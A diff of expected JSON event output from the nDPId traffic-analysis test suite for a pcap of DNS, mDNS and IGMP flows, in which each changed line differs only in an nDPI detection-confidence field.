00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1626168075665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1626168075665,"pkt":"WNVuaKQA8BiYFWV8CABFAABHYLwAAEARR7nAqAF5CAgICMwbADUAM5mdqksBAAABAAAAAAAAAjYwAjIxAzE0OQI1Mgdpbi1hZGRyBGFycGEAAAwAAQ=="} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"60.21.149.52.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1626168075665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168075665,"pkt":"WNVuaKQA8BiYFWV8CABFAABIJLIAAEARg8LAqAF5CAgICMwbADUANFbmSGkBAAABAAAAAAAAAzEzOQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168075664,"flow_last_seen":1626168075675,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075675,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1626168075664,"flow_last_seen":1626168075681,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1626168075681,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1626168075664,"flow_last_seen":1626168075665,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075665,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168075664,"flow_last_seen":1626168075675,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168075675,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"139.1.168.192.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1626168075664,"flow_last_seen":1626168075681,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1626168075681,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"60.21.149.52.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1626168075993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1626168075993,"pkt":"AQBeAAD76qnehSPOCABFAAB0G+EAAP8R\/GjAqAGL4AAA+xTpFOkAYH4FAAAAAAACAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEAACkFoAAAEZQAEgAEAA4Aumq\/a01YO+qp3oUjzg=="} 
-00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1626168075993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":150,"pkt_l4_len":96,"thread_ts_msec":1626168075993,"pkt":"MzMAAAD76qnehSPOht1gCggAAGAR\/\/6AAAAAAAAAEFmoWPnnz5T\/AgAAAAAAAAAAAAAAAAD7FOkU6QBgoIcAAAAAAAIAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQAAKQWgAAARlAASAAQADgC6ar9rTVg76qnehSPO"} -00711{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 
+00711{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075993,"flow_last_seen":1626168075993,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1626168075993,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00910{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1626168076015,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1626168076015,"pkt":"6qnehSPO8BiYFWV8CABFAAFxqZwAAP8RjIrAqAF5wKgBixTpFOkBXfEmAACEAAAAAAEAAAAFD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUAAgFTUJQcm\/ADMAyACGAAQAAAHgADgAAAADN8QVNQlByb8AhwDIAEIABAAARlAB3EXJwSE49ZWYzZjBmMDE0OThlDHJwRmw9MHgyMDAwMApycFZyPTIxMC40EXJwSEE9NjM4Y2VmMTVmYTJiEXJwQUQ9YzJlYTRjNWFjZmVlEXJwSEk9MmRiM2M5NTVjZDgyFnJwQkE9NTM6REQ6Qjk6MDY6QjU6MDAFTUJQcm8MX2RldmljZS1pbmZvwBwAEAABAAARlAAzFG1vZGVsPU1hY0Jvb2tQcm8xNCwxCm9zeHZlcnM9MjASZWNvbG9yPTIyNSwyMjUsMjIzwEwAHIABAAAAeAAQ\/oAAAAAAAAAIKbjnNzdtvsBMAAGAAQAAAHgABMCoAXk="} -00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 
+00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076015,"flow_last_seen":1626168076015,"flow_idle_time":200000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1626168076015,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1626168076607,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1626168076607,"pkt":"AQBeAAAC6qnehSPOCABGAAAgeZkAAAECCQnAqAGL4AAAApQEAAAXAAgE4AAA+w=="} 
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1626168076607,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1626168076607,"pkt":"AQBeAAD76qnehSPOCABGAAAgaRwAAAECGI3AqAGL4AAA+5QEAAAWAAkE4AAA+w=="} -00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168076607,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1626168077017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1626168077017,"pkt":"AQBeAAD76qnehSPOCABFAACI8IoAAP8RJ6vAqAGL4AAA+xTpFOkAdC8RAAAAAAACAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAHADAAMAAEAABGUAAgFTUJQcm\/ADAAAKQWgAAARlAASAAQADgC6ar9rTVg76qnehSPO"} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1626168077017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":170,"pkt_l4_len":116,"thread_ts_msec":1626168077017,"pkt":"MzMAAAD76qnehSPOht1gCggAAHQR\/\/6AAAAAAAAAEFmoWPnnz5T\/AgAAAAAAAAAAAAAAAAD7FOkU6QB0UZMAAAAAAAIAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAcAMAAwAAQAAEZQACAVNQlByb8AMAAApBaAAABGUABIABAAOALpqv2tNWDvqqd6FI84="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1626168077413,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077413,"pkt":"WNVuaKQA8BiYFWV8CABFAABAe7EAAEARLMvAqAF5CAgICNkPADUALCfrXeUBAAABAAAAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAQQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077413,"flow_last_seen":1626168077413,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077413,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": 
{"query":"wdcp.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1626168077415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077415,"pkt":"WNVuaKQA8BiYFWV8CABFAABA7DEAAEARvErAqAF5CAgICNJ8ADUALMmVww0BAAABAAAAAAAABHdkY3AJbWljcm9zb2Z0A2NvbQAAAQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077415,"flow_last_seen":1626168077415,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1626168077415,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":53884,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": 
